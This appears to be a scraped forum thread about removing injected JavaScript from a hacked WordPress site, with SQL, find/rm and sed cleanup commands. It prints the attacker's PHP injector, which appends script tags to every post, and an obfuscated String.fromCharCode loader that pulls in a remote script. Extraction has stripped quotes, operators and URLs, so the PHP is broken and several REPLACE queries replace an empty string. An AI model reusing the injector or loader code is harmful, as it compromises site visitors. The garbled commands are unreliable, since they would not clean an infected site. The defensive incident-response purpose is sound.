How to bulk delete a certain part of all wordpress posts

site been hacked, and all posts been injected a line of js code under the content!

script src='' type='text/javascript'/script

I have found the malware file in the root directory, which inject the JS code with the command:

$result = $conn-query($q);
if ($result-num_rows  0) {
    while($row = $result-fetch_assoc()) {
        $q2 = SELECT post_content FROM  . $row[TABLE_SCHEMA]. . . $row[TABLE_NAME].  LIMIT 1 ;
    $result2 = $conn-query($q2);
    if ($result2-num_rows  0) {
        while($row2 = $result2-fetch_assoc()) {
            $val = $row2['post_content'];
            if(strpos($val, === false){
                if(strpos($val, === false){
                    $q3 = UPDATE  . $row[TABLE_SCHEMA]. . . $row[TABLE_NAME]. set post_content = CONCAT(post_content,\script src='' type='text/javascript'/script\) WHERE post_content NOT LIKE '';
                    echo sql: . $row[TABLE_SCHEMA]. . . $row[TABLE_NAME];
                } else {

    } else {
} else {

Someone please help me with a MYSQL command so I can delet this code from the PHPmyadmin.

Topic hacked phpmyadmin mysql Wordpress

Category Web

This is my list of commands for linux centos:

1. remove malware scripts

find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
find /var/www/ -type f -name "_t" -exec rm -f "{}" +;

Put this command in cron to keep the server clean (delete malicious files every 15 miunts if founded in the server):

# execute every 15 minutes
*/15 * * * *  find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;

2. clean cache from WP plugin

3. clean db

use this sql query

#check affected records
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";

#clean db
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type='text/javascript' src=''></script", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src="""" type=""text/javascript""></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='' type='text/javascript'></script>", ''));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src="""" type=""text/javascript""></script>", ''));

#recheck if all is clean
SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%"

4. check and clean malicious code inside the file

check for plain text malicios code:

cd /var/www
grep -rlF "donatello"
grep -rlF "blackwater"
grep -rlF "lowerbeforwarden"

clean code injected as plain text:

grep -rlF "donatello" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/\/statistics.js?n=nb5'><\/script>//g"
grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/\/src.js?n=nb5'><\/script>//g"

check for crypted malicios code, if you convert the numeric string


in utf8, will see:


found the code:

    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"

remove the code:

grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();<\/script>//g"
grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();//g"

The last crypted string is related to "lowerbeforwarden" variant. Use the right sequence for "donatello".

Hope this help.

to @Behemoth thanks for your reply! I just edited your command with " since there is ' in the js code, it works!

UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='' type='text/javascript'></script>", '');

I use the paid theme, some paid plugins but 2 nulled plugins, that's shame! Now looking for some tools to check the codes! hope can find out the backdoor ...

Goto PHPmyadmin. Click on Database and run the following SQL query:

UPDATE wp_posts SET post_content=(REPLACE (post_content, '',''));  

The above contains the js script src. We are just removing that.

This happens due to many reasons. And you have to find out the exact source of infection. This is mostly occurs in pirated/ nulled themes. Well follow the steps below to successfully get rid of this.


  1. Use VS Code or something similar that supports "search in files" option. (not Notepad++)
  2. Download the fresh WordPress (The version you are using)


  1. Download a complete backup of your project from server and place it in some folder (say project-dev).
  2. Open that folder using VS Code.
  3. Click on Edit > Search in files
  4. Search for "base64". Ensure that nothing is encoded. If you find something try to decode it. There are a lot of online base64 decoder available.
  5. Check the function.php file. Check the first line of the file. It should start from a comment. If not then check whats written. If this is something like
    "class.[sometext]" or "dir/password" or "id/password" followed by some hash inside a if statement, Then remove that until the proper comment line. (Most theme starts from a comment)
  6. Make sure all the files in theme are required. and you have no more codes like this.
  7. Most of the case it resides in 2 to 3 places.
  8. Now copy the folder "project-dev/your-project/wp-content/themes/theme-name".
  9. Extract the fresh WordPress you have downloaded before in another directory.
  10. paste the copied theme folder in to your new WordPress.
  11. Copy whole thing and upload it back to server and change the wp-config file.
  12. Also clear the DB that I have mentioned earlier.

If you are stuck then ping me on [email protected]


Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.